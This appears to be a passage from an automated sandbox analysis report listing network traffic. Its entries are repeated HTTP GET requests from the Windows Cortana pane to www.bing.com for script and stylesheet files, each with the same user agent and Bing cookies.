Source: global traffic	HTTP traffic detected: GET /rb/6g/ortl,cc,nc/e4dGDxAW9F-ma-5R0R9ecUZvrO4.css?bu=D4YMiQyODJUMmQydDKEMpQypDLAMtAy3DNcK1wrXCg&or=w HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe; CortanaAppUID=86C652E36F6375931C08ED6C3999DD13; MUIDB=D9EE76C82CF84F4CB285EDFBD8B1C981
Source: global traffic	HTTP traffic detected: GET /rb/6g/ortl,cc,nc/mNTNSYmdkpZ8dkFq4cRJ9JsSlUg.css?bu=CY4N1wrXCtcK1wrXCtcK1wrXCg&or=w HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe; CortanaAppUID=86C652E36F6375931C08ED6C3999DD13; MUIDB=D9EE76C82CF84F4CB285EDFBD8B1C981
Source: global traffic	HTTP traffic detected: GET /rp/8ScIVnAWFmAXdMok1m1tPNFIXwI.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe; CortanaAppUID=86C652E36F6375931C08ED6C3999DD13; MUIDB=D9EE76C82CF84F4CB285EDFBD8B1C981
Source: global traffic	HTTP traffic detected: GET /rp/8v3PDJ8BSRYTkmhRjj5bDaE4Bow.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe; CortanaAppUID=86C652E36F6375931C08ED6C3999DD13; MUIDB=D9EE76C82CF84F4CB285EDFBD8B1C981
Source: global traffic	HTTP traffic detected: GET /rp/Cj3ZU8zX_sufjrVdLFel-pJdQTs.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe; CortanaAppUID=86C652E36F6375931C08ED6C3999DD13; MUIDB=D9EE76C82CF84F4CB285EDFBD8B1C981
Source: global traffic	HTTP traffic detected: GET /rp/DJdKZJ5TiipFP9qvAe8JcLK3qWk.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe; CortanaAppUID=86C652E36F6375931C08ED6C3999DD13; MUIDB=D9EE76C82CF84F4CB285EDFBD8B1C981
Source: global traffic	HTTP traffic detected: GET /rp/Fup_s3i1bsDlBOoylbrwotn6JsU.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe; CortanaAppUID=86C652E36F6375931C08ED6C3999DD13; MUIDB=D9EE76C82CF84F4CB285EDFBD8B1C981
Source: global traffic	HTTP traffic detected: GET /rp/GYWzw6Wnh2goOCGJn_s6AhjfSck.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe; CortanaAppUID=86C652E36F6375931C08ED6C3999DD13; MUIDB=D9EE76C82CF84F4CB285EDFBD8B1C981
Source: global traffic	HTTP traffic detected: GET /rp/KHoM3KM8zSuzcs-bcJqw8c9CGAs.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe; CortanaAppUID=86C652E36F6375931C08ED6C3999DD13; MUIDB=D9EE76C82CF84F4CB285EDFBD8B1C981
Source: global traffic	HTTP traffic detected: GET /rp/OyB3Im9MEpadu8ggKkhPttYWIvY.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe; CortanaAppUID=86C652E36F6375931C08ED6C3999DD13; MUIDB=D9EE76C82CF84F4CB285EDFBD8B1C981
Source: global traffic	HTTP traffic detected: GET /rp/TdECMV0TRBVEcANtOCAjiC_gQ1M.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe; CortanaAppUID=86C652E36F6375931C08ED6C3999DD13; MUIDB=D9EE76C82CF84F4CB285EDFBD8B1C981
Source: global traffic	HTTP traffic detected: GET /rp/Uicjz5_Idvl9FRKtwKPHILZoadU.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe; CortanaAppUID=86C652E36F6375931C08ED6C3999DD13; MUIDB=D9EE76C82CF84F4CB285EDFBD8B1C981
Source: global traffic	HTTP traffic detected: GET /rp/VmuffrhKTBwHLXj08x9tBHVoxjg.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe; CortanaAppUID=86C652E36F6375931C08ED6C3999DD13; MUIDB=D9EE76C82CF84F4CB285EDFBD8B1C981
Source: global traffic	HTTP traffic detected: GET /rp/XBD4eliP00lsoKoFXsCwCzvKlSo.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe; CortanaAppUID=86C652E36F6375931C08ED6C3999DD13; MUIDB=D9EE76C82CF84F4CB285EDFBD8B1C981
Source: global traffic	HTTP traffic detected: GET /rp/YdkRJN1Cgndw2b5FyfmuFrQJnME.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe; CortanaAppUID=86C652E36F6375931C08ED6C3999DD13; MUIDB=D9EE76C82CF84F4CB285EDFBD8B1C981
Source: global traffic	HTTP traffic detected: GET /rp/Z9hYXc38AnqyLF2U6SIx7fPVgp0.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe; CortanaAppUID=86C652E36F6375931C08ED6C3999DD13; MUIDB=D9EE76C82CF84F4CB285EDFBD8B1C981
Source: global traffic	HTTP traffic detected: GET /rp/ZCN6Jt5jiheS-byF8yUvSkUoxCA.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe; CortanaAppUID=86C652E36F6375931C08ED6C3999DD13; MUIDB=D9EE76C82CF84F4CB285EDFBD8B1C981
Source: global traffic	HTTP traffic detected: GET /rp/ZSK_sI1G2xBbykcG0PbZqcFTIIE.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe; CortanaAppUID=86C652E36F6375931C08ED6C3999DD13; MUIDB=D9EE76C82CF84F4CB285EDFBD8B1C981
Source: global traffic	HTTP traffic detected: GET /rp/_f0mY9SVPYO7W_X99KPZzvkum8U.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe; CortanaAppUID=86C652E36F6375931C08ED6C3999DD13; MUIDB=D9EE76C82CF84F4CB285EDFBD8B1C981
Source: global traffic	HTTP traffic detected: GET /rp/codKHQHLDS_VLJhKpR-n9MSEOvo.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.10.19041; 10.0.0.0.19045.3324) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=D9EE76C82CF84F4CB285EDFBD8B1C981; _SS=SID=343D287893BC6D5106693DCB92436C3C&CPID=1742302774036&AC=1&CPH=7cd2f5a2; _EDGE_S=SID=343D287893BC6D5106693DCB92436C3C&mkt=de-ch; SRCHUID=V=2&GUID=41B91B285C1348C6833302243C6E4A4A&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250318&DS=1; SRCHHPGUSR=IPMH=3c5e799b&IPMID=1742302774036&SRCHLANG=de&HV=1760683968&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCdGsgWUVTEYqZQacS2Gu6Zv5imz7PwjGVePAJKtyiSPzRsEzX1tFr30C-3qhaIEh-vd_P6NnnlxStTq-MEyUNiSiCpKN6Xd_U0vODZRlsXFGF0TAEkP8BVpDWE9vMc-AFKgCIujxKku4gD-gAzAuvWe; CortanaAppUID=86C652E36F6375931C08ED6C3999DD13; MUIDB=D9EE76C82CF84F4CB285EDFBD8B1C981
